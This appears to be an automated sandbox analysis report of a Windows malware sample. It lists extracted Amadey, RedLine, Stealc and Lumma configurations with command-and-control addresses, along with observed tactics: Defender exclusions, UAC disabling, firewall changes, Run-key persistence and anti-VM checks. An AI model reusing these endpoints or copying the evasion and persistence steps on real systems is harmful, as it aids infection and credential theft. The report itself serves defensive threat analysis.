Analysis
max time kernel: 299s
max time network: 293s
platform: windows10-1703_x64
resource: win10-20240404-en
resource tags: arch:x64 arch:x86 image:win10-20240404-en locale:en-us os:windows10-1703-x64 system
submitted: 05/05/2024, 22:25 UTC
Static task
static1
Behavioral task
behavioral1
Sample
2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe
Resource
win10-20240404-en
General
Target: 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe
Size: 1.8MB
MD5: f5a33e2c9e2f68449a07778cc2edf846
SHA1: 9b1c77c93fdf834a281da35fb3d5060d6de64de6
SHA256: 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203
SHA512: cacf32b567797196a636d17ab2457cbe1bbd25f339cef8bd46848abba8d0e60ebbb5937d378a3300c8c0f242743489ceb1909039ebcf9670cabaecf08afdb12e
SSDEEP: 49152:kcvZBay16INgG3P2GHYTAIEj6G3KdbeuBJI4:ki1tC3KX66cR/I
Malware Config
Extracted
amadey
4.18
http://193.233.132.56
install_dir: 09fd851a4f
install_file: explorha.exe
strings_key: 443351145ece4966ded809641c77cfa8
url_paths: /Pneh2sXQk0/index.php
Extracted
redline
Test1234
185.215.113.67:26260
Extracted
stealc
http://52.143.157.84
url_path: /c73eed764cc59dcb.php
Extracted
redline
@CLOUDYTTEAM
185.172.128.33:8970
Extracted
lumma
https://affordcharmcropwo.shop/api
https://cleartotalfisherwo.shop/api
https://worryfillvolcawoi.shop/api
https://enthusiasimtitleow.shop/api
https://dismissalcylinderhostw.shop/api
https://diskretainvigorousiw.shop/api
https://communicationgenerwo.shop/api
https://pillowbrocccolipe.shop/api
https://zippyfinickysofwps.shop/api
https://acceptabledcooeprs.shop/api
https://obsceneclassyjuwks.shop/api
Signatures
Detect ZGRat V1 4 IoCs
resource yara_rule
behavioral2/memory/4872-239-0x0000000000400000-0x0000000000592000-memory.dmp family_zgrat_v1
behavioral2/files/0x000700000001abf3-247.dat family_zgrat_v1
behavioral2/memory/236-267-0x00000000006A0000-0x0000000000760000-memory.dmp family_zgrat_v1
behavioral2/memory/5568-2452-0x000002739D7A0000-0x00000273A1098000-memory.dmp family_zgrat_v1
Modifies firewall policy service 2 TTPs 1 IoCs
description ioc Process
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" smyDlk5Es9ywvt8vYzqP4xsg.exe
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine payload 6 IoCs
resource yara_rule
behavioral2/files/0x000800000001aba6-41.dat family_redline
behavioral2/memory/3956-49-0x0000000000A20000-0x0000000000A72000-memory.dmp family_redline
behavioral2/memory/4280-249-0x0000000000BF0000-0x0000000000C42000-memory.dmp family_redline
behavioral2/files/0x000700000001abf2-248.dat family_redline
behavioral2/files/0x000700000001abf3-247.dat family_redline
behavioral2/memory/236-267-0x00000000006A0000-0x0000000000760000-memory.dmp family_redline
description ioc Process
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe
description ioc Process
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\WNVWzyQ9U4x61stEDAP6lzkw.exe = "0" WNVWzyQ9U4x61stEDAP6lzkw.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Ckl9TyIZXKdlKs1JCVsLffk7.exe = "0" Ckl9TyIZXKdlKs1JCVsLffk7.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3QQWENYHN4zHu7XvvsSKZTYq.exe = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\YYVxHJ2hAo7YMQ97pBCimtCf.exe = "0" YYVxHJ2hAo7YMQ97pBCimtCf.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\4767d2e713f2021e8fe856e3ea638b58.exe = "0" 4767d2e713f2021e8fe856e3ea638b58.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe
XMRig Miner payload 2 IoCs
resource yara_rule
behavioral2/files/0x000700000001ac02-405.dat family_xmrig
behavioral2/files/0x000700000001ac02-405.dat xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ smyDlk5Es9ywvt8vYzqP4xsg.exe
Blocklisted process makes network request 7 IoCs
flow pid Process
18 3956 jok.exe
171 2696 rundll32.exe
122 4296 rundll32.exe
122 4296 rundll32.exe
127 5688 rundll32.exe
127 5688 rundll32.exe
122 4296 rundll32.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 36 IoCs
Run Powershell and hide display window.
pid Process
5580 powershell.exe
5212 powershell.exe
5208 powershell.EXE
5432 powershell.exe
5112 powershell.exe
1252 powershell.exe
1268 powershell.exe
6000 powershell.exe
5224 powershell.exe
5744 powershell.exe
5428 powershell.exe
2716 powershell.exe
5812 powershell.exe
5708 powershell.exe
724 powershell.exe
2556 powershell.exe
4208 powershell.exe
1628 powershell.exe
2448 powershell.exe
5820 powershell.exe
1044 powershell.exe
4488 powershell.exe
428 powershell.exe
5872 powershell.exe
1200 powershell.exe
2092 powershell.exe
3904 powershell.exe
5764 powershell.exe
5848 powershell.exe
5872 powershell.exe
6116 powershell.exe
4568 powershell.exe
6088 powershell.exe
4232 powershell.exe
2164 powershell.exe
3544 powershell.exe
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 5 IoCs
pid Process
4188 netsh.exe
3904 netsh.exe
4476 netsh.exe
5636 netsh.exe
2692 netsh.exe
Checks BIOS information in registry 2 TTPs 19 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion smyDlk5Es9ywvt8vYzqP4xsg.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion smyDlk5Es9ywvt8vYzqP4xsg.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process
Key value queried \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation FhZPPvs.exe
Key value queried \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation CotgOgQ.exe
Drops startup file 9 IoCs
description ioc Process
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bBRtpNfgmiXyk90SOu7jdxVQ.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\R3AJssgn42PsZGJfIPhYJzUY.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C4l2aZebimGIGhUFt0UPniVZ.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1XjlfxxoVzwfqMXpTdzAx628.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eDl7QnE43R2Ibz8zT4SK0Ewo.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\U7kGQmmC565krYEDHEEl2dXZ.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JffY3gQsg2oimfd4I3MT3QXS.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7JYlJEJ6x6NFSKxoCKFUt4KG.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Qao1FFw1lSdDnoSzwLvTgTko.bat regsvcs.exe
Executes dropped EXE 64 IoCs
pid Process
2992 explorha.exe
2712 swiiiii.exe
3956 jok.exe
1968 swiiii.exe
2316 file300un.exe
2796 gold.exe
2736 b1nbwn523WEOir6D5RHSIeEr.exe
2888 WNVWzyQ9U4x61stEDAP6lzkw.exe
2244 3QQWENYHN4zHu7XvvsSKZTYq.exe
3256 Ckl9TyIZXKdlKs1JCVsLffk7.exe
2420 YYVxHJ2hAo7YMQ97pBCimtCf.exe
4772 explorha.exe
2744 alexxxxxxxx.exe
4280 keks.exe
236 trf.exe
2552 install.exe
4560 GameService.exe
4116 GameService.exe
1628 GameService.exe
4652 GameService.exe
3828 GameService.exe
2708 GameSyncLink.exe
4728 GameService.exe
5100 GameService.exe
4304 GameService.exe
648 GameService.exe
4560 GameService.exe
504 PiercingNetLink.exe
596 GameService.exe
4368 GameService.exe
4232 GameService.exe
2464 GameService.exe
4412 GameSyncLinks.exe
4368 GameSyncLink.exe
4228 PiercingNetLink.exe
2564 GameSyncLinks.exe
360 GameSyncLink.exe
4352 PiercingNetLink.exe
4036 GameSyncLinks.exe
1784 smyDlk5Es9ywvt8vYzqP4xsg.exe
2592 NewB.exe
4904 ISetup8.exe
2796 PiercingNetLink.exe
3052 toolspub1.exe
4860 4767d2e713f2021e8fe856e3ea638b58.exe
4116 w5WMABIkihlCRso1g89r14TE.exe
5160 Install.exe
5756 GameSyncLinks.exe
5768 GameSyncLink.exe
1436 PiercingNetLink.exe
5780 Install.exe
5476 GameSyncLinks.exe
5216 GameSyncLink.exe
5656 EGijUa0yZwO1E3ULKTt8Y0Pe.exe
5728 Install.exe
5864 explorha.exe
5540 NewB.exe
1392 Install.exe
5176 CotgOgQ.exe
5788 FhZPPvs.exe
5572 PiercingNetLink.exe
3824 GameSyncLinks.exe
5388 GameSyncLink.exe
4960 u240.0.exe
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description ioc Process
Key opened \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Wine explorha.exe
Key opened \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Wine explorha.exe
Key opened \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Wine explorha.exe
Key opened \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Wine 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe
Key opened \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Wine explorha.exe
Key opened \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Wine explorha.exe
Key opened \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Wine explorha.exe
Loads dropped DLL 6 IoCs
pid Process
3056 rundll32.exe
2696 rundll32.exe
4296 rundll32.exe
5688 rundll32.exe
4960 u240.0.exe
4960 u240.0.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
resource yara_rule
behavioral2/memory/1784-442-0x0000000140000000-0x0000000140861000-memory.dmp themida
behavioral2/memory/1784-504-0x0000000140000000-0x0000000140861000-memory.dmp themida
behavioral2/memory/1784-576-0x0000000140000000-0x0000000140861000-memory.dmp themida
description ioc Process
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Ckl9TyIZXKdlKs1JCVsLffk7.exe = "0" Ckl9TyIZXKdlKs1JCVsLffk7.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\YYVxHJ2hAo7YMQ97pBCimtCf.exe = "0" YYVxHJ2hAo7YMQ97pBCimtCf.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3QQWENYHN4zHu7XvvsSKZTYq.exe = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\WNVWzyQ9U4x61stEDAP6lzkw.exe = "0" WNVWzyQ9U4x61stEDAP6lzkw.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\4767d2e713f2021e8fe856e3ea638b58.exe = "0" 4767d2e713f2021e8fe856e3ea638b58.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 3QQWENYHN4zHu7XvvsSKZTYq.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" WNVWzyQ9U4x61stEDAP6lzkw.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" Ckl9TyIZXKdlKs1JCVsLffk7.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" YYVxHJ2hAo7YMQ97pBCimtCf.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 4767d2e713f2021e8fe856e3ea638b58.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
description ioc Process
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA file300un.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA smyDlk5Es9ywvt8vYzqP4xsg.exe
Drops Chrome extension 4 IoCs
description ioc Process
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json FhZPPvs.exe
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json CotgOgQ.exe
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json FhZPPvs.exe
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json CotgOgQ.exe
Drops desktop.ini file(s) 1 IoCs
description ioc Process
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Install.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc
38 pastebin.com
37 pastebin.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc
86 ipinfo.io
Manipulates WinMonFS driver. 1 IoCs
Rootkits write to WinMonFS to hide directories/files from being detected.
description ioc Process
File opened for modification \??\WinMonFS csrss.exe
Drops file in System32 directory 63 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_672E22BF4DD6902F7F85F941E23571DA CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5 CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification 
C:\Windows\System32\GroupPolicy\GPT.INI smyDlk5Es9ywvt8vYzqP4xsg.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5 CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA CotgOgQ.exe File opened for modification 
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_672E22BF4DD6902F7F85F941E23571DA CotgOgQ.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol CotgOgQ.exe File opened for modification C:\Windows\System32\GroupPolicy smyDlk5Es9ywvt8vYzqP4xsg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat FhZPPvs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA CotgOgQ.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 CotgOgQ.exe File opened for modification 
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 FhZPPvs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_C66311BFC31F329FE5E6FBB46563B719 CotgOgQ.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for 
modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol FhZPPvs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData CotgOgQ.exe File opened for modification 